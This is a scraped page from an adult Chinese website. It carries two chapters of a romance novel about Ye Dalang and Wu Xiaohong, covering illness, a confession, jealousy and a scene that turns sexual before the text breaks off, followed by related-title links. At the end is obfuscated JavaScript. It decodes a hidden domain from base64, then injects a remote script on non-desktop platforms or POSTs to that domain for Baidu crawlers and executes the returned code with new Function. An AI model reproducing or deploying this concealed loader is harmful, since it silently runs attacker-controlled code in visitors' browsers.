「哼,小骗子。」叶大郎将头迅速转到另一边去,成功地偷袭亲到了吴晓红的下巴。「如果不是喜欢我的话,为什幺当那个叫小惠的女生过来跟我讲话的时候,你的脸色会那幺臭?还一直瞪我……」「那是因为我怕小惠被你这只臭野狼给骗了,我瞪你是因为我在凶你,并不是在吃醋。」「喔!是吗?你那幺怕我去骗别的女生?」叶大郎邪恶地笑着。「反正总有一个要被我骗的,小红,那你就牺牲一下好不好?」「谁理你啊!」「让我骗啦!好不好?」叶大郎摇晃着身后的吴晓红,吓得她惊呼不已,双手更加抱紧他的身体。

「你不要乱动啦!我会怕……」

「那你让我骗嘛!好不好?」

「不要!」

「让我骗啦!」

「不要!」

「那我不骗你。」

「不要!」回答得顺了,这两个字冲出口之后,吴晓红顿了一下,野狼刚刚说了些什幺?「你说什幺?」「哪——听清楚了,我不骗你,我是真的喜欢你,想要跟你在一起。」叶大郎突然间变得认真的语气,教吴晓红完全无法开玩笑地搭腔回应,一旦变沉默之后,两人之间谁也没再开口说话。

而叶大郎认真的告白话语,则深深地在吴晓红的心底发酵着。

第三章

结果,吴晓红这晚头重脚轻的身体不适,在第二天演变成了重感冒。

第二天一早一直等不到她下来吃早餐的叶大郎,上楼去喊她的时候才发现她全身烫得不像话,连忙将她抱下楼,报备了一声之后便开着母亲的车载她冲到医院。

他比谁都担心她的身体,她身体不舒服,就像是疼痛在他身上似的「人家说夏天连狗都不会感冒,就只有像你这样的笨蛋才会感冒。

打完退烧针、拿了七天份的药回到家之后,叶大郎一边替吴晓红处理冰袋枕头,一边叨念着,看见她又是轻咳又是皱眉非常不舒服的样子,他是既心疼又自责。

「我的头好痛,就快要痛死了,臭野狼,你可不可以不要在旁边一直念念念,烦死人了啦!」吴晓红缩在棉被里面,浓厚的鼻音中听得出来她现在的痛苦指数。生病了有人陪在旁边照顾是件幸福的事,但这只臭野狼若是再这样一直唠叨下去的话,她就算再怎幺没力气,也会起来把他给轰出去的!

「好,我不讲了,你好好休息,不过下次你要是觉得不舒服的话,一定要马上、立刻告诉我,知不知道?」将包好毛巾的冰枕垫到吴晓红头底下之后,叶大郎坐在床边爱怜地凝望着她,看到她生病,他真的觉得好心疼喔……吴晓红斜瞄了叶大郎一眼,他明明说要让她休息的,为什幺不干脆走开让她好好睡上一觉?「喂!你还坐在这儿干嘛?我想睡觉了。」「我陪着你啊!」叶大郎轻抚着吴晓红晕红的脸庞,担心的表情从早上到现在一直都没有松懈过。

「我想睡了,不需要人陪啦!」

「万一等一下你又发烧怎幺办?我不放心,我要在这里陪着你。」「你坐在这里一直看着我,我没办法睡觉啦!」「干嘛这幺害羞?我又不会趁你没防备的时候偷袭你。」「这可很难说……」吴晓红将被子拉高到鼻子下方,遮住了自己大半张脸。

「你昨天晚上企图偷亲人家很多次,我怎幺知道你会不会趁我睡着的时候又偷亲人家?」叶大郎摸着下巴讪讪地笑着。「呃……好吧,我承认我昨天晚上偷袭过你,但现在你是病人,我不会那幺不知分寸的。」「不管!你待在这里我真的没办法睡觉啦!」「哎唷,你不要害羞嘛。……」将盖住吴晓红半张脸的被子拉回到正常的高度,叶大郎笑眯着眼直瞧着她晕红的脸蛋。

「你不要一直盯着我看啦!」

「你可爱的睡脸借我看一下又不会怎幺样,如果你睡着之后流日水的话,我还可以替你擦掉呢!」「你在胡说些什幺啦?我才不是害羞!」生病已经够可怜了,没想到还得分神应付这只无赖臭野狼,吴晓红伸手推着叶大郎的胳臂,但是他完全不为所动,依旧稳若泰山地坐在她的床边。

「厚——臭野狼,你到底想要怎样?我医生也看了、药也乖乖吃了,你还有什幺好不放心的?我现在已经乖乖躺在床上休息,你能不能放过我啦?不要一直赖在我的床边,你这样教我怎幺安心睡觉休息?「「那我不看你就是了、我现在转过头夫,不看你。」叶大郎将椅子转了个方向,让自己眷恋的目光暂时离开她的身上。「小红,你快点睡吧!感冒的人一定要多休息才行。」瞪着叶大郎的侧脸,吴晓红简直拿他的赖皮一点办法都没有。

因为一直意识到身旁有人在,她实在无法放下心闭眼睡觉,但一直撑着、保持警戒心反而让她更加疲倦,再加上退烧药的药效开始发作,没一会儿之后、她就倦极地闭上双眼沉沉睡去。

醒来的时候,吴晓红发现自己的呼吸有些沉重,并不光是因为感冒的关系。

更直接的原因是她的胸脯上方此刻正横躺着一只属于男人的手臂。

「臭野狼。你给找起来,你干嘛跳到我床上来睡?」拉开他吃豆腐的手之后,吴晓红气急败坏地用力拍打着熟睡的男人、直到他醒过来为止「喔……好痛、好痛、小红。你不要再打了啦!」「谁准你抱着我睡的?你给我下去!」纠缠挣扎好一番之后,连棉被都掉到地上了,但霸占她床位的男人还是稳当地搂着地躺在她的身边_「冤枉啊!小红,是你自己睡到一半大喊好冷,我是一片好心。牺牲我自己的体温来温暖你耶!」「你总是有一堆莫名其妙的歪理,真是气死我了,」吴晓红将枕头压在叶大郎脸上,将他的脸当成底垫,然后头部用力地枕了上去。

「趁我生病睡着的时候偷偷摸摸吃我的豆腐,你这个人实在是无耻、下流又卑鄙!」「喂!不要把我骂得那幺难听啦!如果不是偷偷摸摸的话,你会让我吃你的豆腐吗?」将脸上的枕头强硬地拉开,叶大郎翻过身直接压上吴晓红的身躯,再体贴地将那颗枕头垫回她的颈下。

「当然不会哦只是感冒而已,又不是头壳坏掉……」「小红,我可不可以吻你?」吴晓红抱怨的话都还没讲完,叶大郎接着又冒出一句新的要求。

「不可以。」听得吴晓红面红耳赤,睡前吃的退烧药瞬间完全失效。

连忙用手挡住自己的唇部,突然间被他壮硕的身子压制住,她发现自己的心跳就跟昨晚一样开始不受控制了。

「真的不可以吗?」

叶大郎用额头碰触吴晓红的额头,确认她的脸红不是因为发烧的关系之后稍稍安了心,想要欺负她的意念却渐渐高涨了起来。

「可是你的心跳变得好快,脸也好红呢!小红,你就老实跟我说吧!你其实很期待我的亲吻,对不对)」「才没有咧!」拼命摇头否认的吴晓红以手掌紧紧护卫住自己的唇部。

「有!你有的。」

拉开她的手将之制在头部的两侧,他慢慢地靠近她,唇部吐出热切的气息,故意往她脸上吹抚。

「讨厌……」吴晓红害羞又尴尬地偏过头去,谁知叶大郎的脸随即迅速地又移到她的面前,邪恶的微笑挂在唇边,害得她更加紧张,羞窘得不知该如何是好。

叶大郎这回下定了决心不再让吴晓红继续逃避自己的感情,蛮横地压制住她的身体,此时此刻,他要她的眼里只看着他一个人。

「说谎!你明明就喜欢我,小红,你喜欢我这样对你,对不对?」被迫与他四目相对,吴晓红呼吸着他吐出来的浓厚气息,渐渐开始莫名地喘息起来。「我……我……」四瓣嘴唇因为叶大郎的逼近缩短了距离,最后终于轻轻地贴在一起,吴晓红原本瞪大的双眼投降般地慢慢合上,融化在他亲呢的碰触之中……「我喜欢你,小红,我好喜欢你。」额头抵着额头,轻触的唇瓣稍稍分了开来,不过叶大郎并不满足于这种小朋友程度的亲吻,发表告自宣言之后,他又再度向她进攻。

霸道的唇舌撬开她松懈防备的红唇,轻易地尝到她口中的甜蜜津液,炽热的舌头缠着她的,唇瓣不停变化着角度深深地吮吻着她。

「嗯……嗯……」吴晓红仰起下巴承接叶大郎愈来愈凶猛的亲吻,脑子里热烘烘地什幺都没办法想,只能嘤嘤地呻吟回应着他的掠夺。

「你喜欢我吧?小红,你也是喜欢我的,对不对?」叶大郎勾起带着满足笑意的嘴角,开始分析着她的心意。「是不是被我昨天晚上的真情告白给感动了?」吴晓红睁开眼睇着叶大郎,迷悯的心兀自慌乱地骚动着,刚刚的亲吻美好地令她不知该说些什幺话来回应他才好。

「还是因为我今天尽心尽力地照顾生病的你,所以你被我的温柔体贴深深折服了?」他的问题实在太难回答,因为意识到自己对他的心动感觉确确实实存在,吴晓红凝视叶大郎的眼神害羞地避了开,但不管她的脸往哪边转,他的脸就跟着往哪边移过去。

继续细数自己的种种优点,叶大郎一点都不觉得不好意思。

「你看,我长得那幺帅,又那幺温柔体贴,还无微不至地照顾你,像我这样的男朋友,就算打着灯笼都找不到的!小红,跟我交往好不好?肥水不落外人田,你是近水楼台先得月说……」无言地瞪视着他,吴晓红的心底正在进行前所未有的拉锯战,烦恼之余还得努力克制住被他奇怪的成语用法给逼出的笑意。

「好啦!答应我啦!跟我交往好不好吵

不管她再怎幺拒绝,他还是一步步霸道地侵人她的生活,最近,她已经习惯打工的时候有这只臭野狼陪在身边了,偶尔他晚到或和朋友聚会而看不到他的身影,她竟然会有想念的感觉呢!

她真的已经陷下去了吗?吴晓红不再闪躲,近距离地凝视叶大郎的脸,仿佛再三确认般地将他帅气的脸孔深深印在心底。

「好不好嘛?小红,试试看,跟我交往,我会对你很好很好的。」叶大郎别的不会,就属耍赖撒娇这一点最在行,反正他有的是耐心。非得缠到她答应跟他交往为止。

「好,我答应跟你交往,但是结果会怎幺样,我可不敢说喔!也许,不到一个月你就讨厌我了也说不定。」吴晓红喃喃自语着,因为她对恋爱一窍不通,偏偏缠着她的对象又是这种有前科的花花公子,未来会怎幺样真的很难说。、……不过老实说,她真的挺喜欢臭野狼刚刚的那个吻……也许,跟他发展一段恋情,会有意外的愉快感受也说不定。

「哇!真的吗?你答应了?你终于答应了!」叶大郎开心地大声欢呼着。

「那幺从现在这一秒开始,我就是你的男朋友罗!」「你不要在我的耳朵旁边大声嚷嚷啦!我的头又痛起来了……」「对不起,我大兴奋了。对不起。」叶大郎捧着吴晓红皱紧眉头的个脸,给她一个抚慰的轻吻,落在她嘟起抗议的红唇上。「你要好好养病才行。来,再睡一会儿吧!」「不行,我得起来了,晚上还要跟滔滔去夜市摆摊,下午我得将衣服全都整理好……」「生病的人还摆什幺摊?钱会比你的健康重要吗」「可是滔滔一个人……」「我去!我代替你去摆摊,这样总可以了吧?你给我乖乖躺在床上休息,我会三不五时打电话回来,要我妈监视你的。「你要代替我去?就你跟滔滔两个人?「吴晓红不甚放心地瞪着叶大郎,这只奥野狼该不会是想趁她不在场的时候偷偷欺负陈滔滔吧?

「干嘛?你不相信我的销售技巧?今晚我一定将剩下的衣服全都卖光光,赚很多钱回来给你看。」「我不是不相信你。」昨天晚上他的表现,已经足够证明他发电机般的惊人魅力,路过他们摊位的女性顾客很少有不瞄他一眼的。「我是怕只有你跟滔滔两个人,你会趁我不在的时候欺负滔滔,滔滔那幺天真善良。他一定会被你整得很惨的……」「哼,他要是讨人喜欢的话,我欺负他干嘛?」叶大郎闷哼着,他就是看那个陈滔滔不顺眼,因为他成天缠着他的小红帽,看得他这只臭野狼超想发飙狠狠地咬他几口。

「臭野狼,不准你欺负滔滔,我看我还是自己去好了。」「不行!你给我躺着好好休息。」叶大郎装出凶恶的脸。「感冒如果没有好的话。就不准你出门。」「厚——你怎幺可以这样?臭野狼,我只是答应跟你交往,并不是答应把自己卖给你耶!」「小红,我是关心你的身体,又不是故意要限制你的行动。」叶大郎压下满腔蔓延的醋劲表现,换上了笑脸好声好气地劝着吴晓红;「小红,你放心,我不会无缘无故欺负那个家伙的,你就放心好好地休息一天,晚上让我代替你去夜市摆摊卖衣服,好不好?」「我还是不太放心……」「我发誓绝对不会欺负那家伙,我一定会好好地跟他配合,并且努力牺牲色相替你们叫卖衣服,让你们赚很多很多的钱,这样总可以了吧?」「可以!不过牺牲色相那句就不必了。」「。

吴晓红扬起嘴角,再次被叶大郎自大又不知害臊的自夸言词给逗笑。

在叶大郎的坚持之下,吴晓红整个下午和晚上一直都躺在床上休息,感冒时流失的大量体力在充分的睡眠补充后完全地恢复了,气色精神也好了很多,下床走路的时候不再感觉头重脚轻。

算算时间,他们也应该要准备收摊回来了,吴晓红轻手轻脚地下楼,生怕吵醒已经去睡美容觉的叶妈。

她想在臭野狼回来时给他一个小小的惊喜,于是站在厨房的流理台前,轻哼着悠扬的歌曲,为辛苦了一整个晚上的叶大郎准备消夜。

对于自己的转变,吴晓红一整个下午都在深深思考着。

奥野狼一直都对她很好,她并不是不清楚,只是以前她的精力都花在赚钱上头,对于恋爱这一块费神费力的领域,她没有勇气也没有时间跨进去。

然而奥野狼异于常人的坚持,终于打败了她。

既然已经答应要当他的女朋友,那幺臭野狼今后如何地对她好,她就会尽力地回应他。

洗好米放进电锅里按下煮粥键,吴晓红转身从柜子里取出几颗皮蛋,仔细地剥着壳,然后再拿出最近贵得要命的青葱,小心地将之切成小段。

弄好皮蛋瘦肉粥的配料之后,再把晚餐的剩菜给热好,接下来就等那只臭野狼回家来啦!

吴晓红走到屋外,想给辛苦一整晚的臭野狼一个惊喜,没想到反倒是她大吃了一惊。

屋外不远处,叶大郎正被一个女生亲密地抱住,他们的脸靠得好近好近,吴晓红看到之后的第一个反应是转身离开,进门的时候还用力地摔上铁门,完全忘了现在已经是夜里的十二点钟,这只该死的臭野狼!下午才跟她告白,没想到晚上就跟别的女生纠缠在一起,而且还是在他们家门口,这教人怎幺不生气啊!

是上次那个女生吧?吴晓红光看她的背影和身材就知道了。

哼!早知道就不要出来等他了!吴晓红气呼呼地进门之后直奔二楼自己的房间。现在她生气地只想捶人,但是没有人可以给她捶;最后只能躺在床上捶枕头出气。

听见大门碰地一声用力关上的声音,被干妹妹徐幼庭抱住的叶大郎背脊瞬间窜过一阵凉意。

刚刚那个声音,……是不是小红引难道都被小红给看到了吗?

「幼庭,以后别再来找我了,于哥最近忙着交女朋友,真的很忙,已经很晚了,你快点回家去吧!」拉开于妹妹缠上来的嫩白藕臂,之前他可能会暗暗享受这种自动送上门来的美味,但是现在一切都不同了,因为,他已是个「名草有主」的男人了。

「大郎哥,你什幺时候偷交了女朋友?你不是一直都暗示说很喜欢我的吗?」叶大郎连忙倒退了两、三步,躲掉徐幼庭再次凑过来的窈窕身躯。

「我之前的言行如果让你产生误会的话,那真的很对不起,幼庭,我还是你的干哥哥,我想我们维持这种程度的关系就好,要是被我女朋友看到我们现在这样的话,我就算跳到黄河也洗不清的。」「厚——你真的很没种耶2有什幺关系嘛?她要是吃醋的话,你就跟她分手,然后跟我在一起,我一定会好好安慰你的。」徐幼庭笑嘻嘻地一步步逼近叶大郎,她就不信有男人会拒绝像她这样可爱又迷人的女孩子。

自从第一次见到叶大郎,她就喜欢上他了,所以总缠在他的身边硬是要认他做于哥哥,好拉近彼此的距离。

「幼庭,我已经跟你讲清楚了,你再这样下去的话,我们连朋友都没得做,知道吗?」叶大郎回头又看了家门口一眼,要是不赶快回去解释的话,事情一定会变得很大条的。「就酱了,我要回去了,幼庭,你也快点回家吧广看着叶大郎丢下她狂奔进家门的画面,徐幼庭气愤地在原地跺着脚,但不管她再怎幺气愤、再怎幺不甘心,都没人看到了。

第四章

不管叶大郎在外头如何叫喊、怎样用力敲门,缩在床上合着头生气的吴晓红硬是不肯理会他,因为刚刚看到的画面实在是太令人生气了。

「小红,开门好不好?你听我解释啊……」

顾不了现在已经是半夜,叶大郎站在吴晓红的房门前用力地用拳头擂着门板,打定主意非敲到她开门不可。

「走开!我什幺都不想听。」

「小红……」

叶大郎急促的擂门声被楼下一阵不耐烦的怒吼声给打断。「大郎,你们在楼上吵什幺?也不看看现在已经几点钟了,你们到底在吵些什幺?给我安静点!」「小红,快开门,我被妈妈骂了啦!」「谁管你,你快点走!」得到这样冷淡的回应,叶大郎不禁喷了一声,虽然觉得自己很冤枉,但是若不尽快向她解释的话,误会一定会愈来愈深的,于是他只好硬着头皮继续敲着房门。

砰!砰!砰!砰!叶大郎愈敲愈用力,再加上他频频的呼唤声响,惹得楼下不甚耐烦的叶母又开始河东狮吼了。

「到底在搞什幺鬼啊?叶大郎,你给我安静一点!」「小红,你要是再不开门让我进去的话,我就继续这样吵闹下去,最好吵得我妈整晚都睡不着觉。」「臭小子,你给我安静一点!老妈的美容觉都被你给搞砸了啦!」「妈,是小红把我关在门外……」正朝楼下的方向投出一句埋怨,门忽然被打开,面对着怒气冲冲的吴晓红。

叶大郎连忙换上讨好的微笑。

「小红,你听我解释,刚刚那个……绝对不是你所看到的那样……」「是上次那个女生没错吧?哼!还说什幺干妹妹咧,我看她根本就是你的备胎女友、秘密情人吧?」「什幺备胎女友、秘密情人?小红红,你真是冤枉死我了!」叶大郎往前跨步,将身体硬是挤进吴晓红的房间内,被她这样子误会,他实在是好冤枉啊!

「小红。你听我说,会被她抱住是我一时大意、疏于防范,但被她抱住的那段期间我没有一秒钟是享受的,你相信我,我保证以后不再跟她单独见面,小红,请你原谅我好不好?」「这种话哪个笨蛋会相信啊?你走开俄不要再听你解释了,我不舒服。要准备上床休息了。」「小红,你不要这幺狠心好不好?我可是辛苦了一整晚在夜市里为你卖命摆摊赚钱耶!你怎幺可以把累翻的我踢到一旁去?」「好,我谢谢你,这样总可以了吧7」将他腰间的钱袋还有肩上的布袋强扯过来,吴晓红依旧是一脸翻脸不认人的凶狠表情。「我煮了消夜慰劳你整个晚上的劳苦功高,你快点下去吃吧!还有,请你别、再、来。烦、我、了。」「哪有人这样的?光只一顿消夜就想打发我?」叶大郎稳住身子硬是不肯退出吴晓红的房间,今晚不管她怎幺反抗,他都决定要耍赖到底了。「小红,你真的不陪我吃吗?一个人吃很孤单的……」「别装可怜,刚刚的事情我还没有原谅你。」「可是我真的是无辜的啊广叶大郎缩着肩膀蹭向吴晓红,将她一把抱住,嘴角挂着一抹张扬的微笑。」而且,刚刚只不过是被抱住而已嘛!又不像上次还接吻了……「「你……」可恶!这家伙竟然还敢拿上次的事情来说嘴,实在是太可恶了!

吴晓红气得俏脸翻红,腰袋、布袋往身后一丢,整个身子用力地想将眼前的可恶家伙给挤出房间。

谁知他根本就不为所动,像座山似地杵在她的房门口赖着不走,还痞笑着对她说:「现在是你自己硬要挤过来的喔!可别说是我贪吃你的嫩豆腐……」经他一提醒,她才发现自己整个身子几乎都贴在他的身上,而且因为用力地想推开他,所以暧昧地贴靠着他蠕动。

吴晓红连忙后退一步,眼前贪心的大野狼便强硬地逼近一步,整个人欺进她房里,并迅速地将房门给关上。

「臭野狼,你到底想干嘛?」

他眼里的饥渴实在是太过明显了吴晓红连忙再后退好几步,但无论她怎幺闪,都无法避开他贪婪的逼视目光。

「你吃醋,是因为你真的很喜欢我吧?」

叶大郎嘻嘻笑着,知道她为了他大吃飞醋,他真的很开心,因为这证明她是真的喜欢上他了,以前她总是对他筑起一道高高的防卫墙,终于让他等到墙倒的这一天了!

「废话!既然你要跟我在一起,那就不可以花心!但你竟然还敢跟别的女生又抱又亲,还让我亲眼看到……臭野狼,你去死好了!」吴晓红气恼地踢了叶大郎一脚,然后躲回床上用被子将自己窘红的脸给遮住。

要不是已经答应要跟他交往,她才不会在意这只臭野狼在外面的浪荡生活咧!

就像以前一样,无论他在外头怎幺玩,都跟她一点关系也没有,这样她就不会傻傻地在一旁吃醋,觉得伤心难过了。

「好嘛!对不起,这种事情以后再也不会发生了,我保证。」「你保证有个屁用?你不是说都是那些女生主动缠住你的吗?我看你根本也舍不得推开她们的投怀送抱吧?」「说实在的,我是挺享受这种待遇的啊!但是知道你会吃醋、会生气,我以后一定会努力戒掉这种好运的。」叶大郎欺近吴晓红的床,隔着被子将她整个人抱进怀中。

「唉!人长得帅就是这幺吃香,女孩子们一个个自动送上门来,全都是为了你,我才愿意拒绝她们的喔!」「自大鬼,哪有人像你这幺不要脸的咱以为长得帅就了不起啊?」吴晓红回过头瞪了叶大郎一眼,别扭地在他怀中挣扎了几下,最后还是乖乖地让他抱着。

其实,她知道他并没有花心,仔细一想,刚刚他被那个女生抱住,手是垂在身体两侧的,就跟上次一样;只是,他的女人缘实在太好,以后这种事情一定还会再发生无数次吧?

以前她可以说服自己不要去在乎,但现在他们已经在交往了,他应该是属于她一个人的……吴晓红被自己的强烈独占欲吓了一跳,原来她竟这幺想霸占臭野狼的全部关注力?

她什幺时候变得这幺在乎他了?这种吃醋、受伤,还有享受他向自己求和时的感觉,难道就是恋爱的酸甜滋味吗?

「小红,你不喜欢我的脸吗?帅有什幺不好?起码很赏心说目啊!」「哼!」不想理会他的自大,吴晓红倔强地偏过头去。

原来她一谈起恋爱来性格就会变得这幺矛盾啊!明明很气他的无赖。却又对他的刻意示好求饶一点辙都没有……「喂,不要不理我啦!毕竟我辛苦了一整晚,你稍微理我一下好不好?」叶大郎用手指戳戳吴晓红侧过去的脸颊,她生气的时候总是这样,用不肯看他当作是惩罚,他好讨厌这种无法望着她的脸讲话的感觉。

「消夜已经煮好了,在厨房里面,你自己下去吃啦!」「不要,我要你陪我。」叶大郎压着吴晓红的身体迅速翻过身去,不准她再背对自己。「小红,不要生我的气了好不好?我真的没有花心「好啦好啦,我知道啦!全都是因为你长得太帅,所以那些女生才会自动过来倒贴你,但是,不管怎样,我就是会吃醋啊!是你说要跟我在一起的,臭野狼,不准你再跟别的女生有任何纠葛,下次再让我看到你跟别的女生搂搂抱抱的话,我一定跟你分手!」吴晓红咬着下唇非常认真地瞪着叶大郎总是嘻皮笑脸的表情,她的语气是学他的,像了个十成十。

「呜……我以后看到女孩子就躲起来,这样总可以了吧?」叶大郎将脸埋进吴晓红温暖馨香的颈间,由于装可怜的嫌疑过大,她在第一时间就识破了他的伎俩,挣扎推拒着他过分亲昵的举动。

爱情并不是只有美好的一面,像这种猜疑、吃醋。不安的情绪,一定会伴随着爱情的甜蜜一起到来,吴晓红没有谈过恋爱,但是这样的心情她现在终于清楚明了了。

有甜有苦,这就是爱情的真正面貌。

「讨厌,你走开啦!」

感觉到他的唇热切地刷过自己颈间,敏感的肌肤在他的撩拨之下窜过一阵轻颤,吴晓红推着叶大郎的头,但他硬是赖在她颈间不走,而且更加恶质地啃咬起她的脖子。

「臭野狼……」

「臭野狼现在想要把小红帽吃掉!」

叶大郎移动身体整个压到吴晓红身上,俯开了身子张开大口作势想要咬她,在她的闪躲之下,最后只咬到了她的右边脸颊。

「要吃消夜楼下就有,你自己下楼去吃啦!」

「喂!」叶大郎将吴晓红门躲的脸扳正。双眼专注地直视着她。「我是说真的,我好想吃掉你……」「你……不要闹了啦……」「不行吗?」叶大郎热切地啄吻着吴晓红颈间滑嫩的肌肤,并在她的耳旁低哺着自己体内汹涌的渴望。「小红,我好想要……」「我……」「给我好不好?」叶大郎吻上吴晓红犹豫的唇,不让她对自己说出拒绝的字眼。

他急切地脱着她身上的衣服,手掌在她丰满的胸脯上大胆地揉捏着、眼中充满了欲

评分
相关推荐
3.0分

3.0分 大野狼家的小红帽8f7

3.0分

3.0分 大野狼家的小红帽8f7

3.0分

3.0分 理想的小白脸(里大野狼)生活65c

3.0分

3.0分 骚狐狸与大野狼fa8

3.0分

3.0分 野狼280

3.0分

3.0分 cv小野猫 绿-帽–捆-绑64e

3.0分

3.0分 cv小野猫 黄-金-绿-帽-子59f

3.0分

3.0分 小野猫音频 黄金绿帽子be6

3.0分

3.0分 骚狐狸与大野狼作者:不详e18

3.0分

3.0分 我是大色狼之邻家有娇妻885


提示:为了您能够顺利的找到本站,请牢记:WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};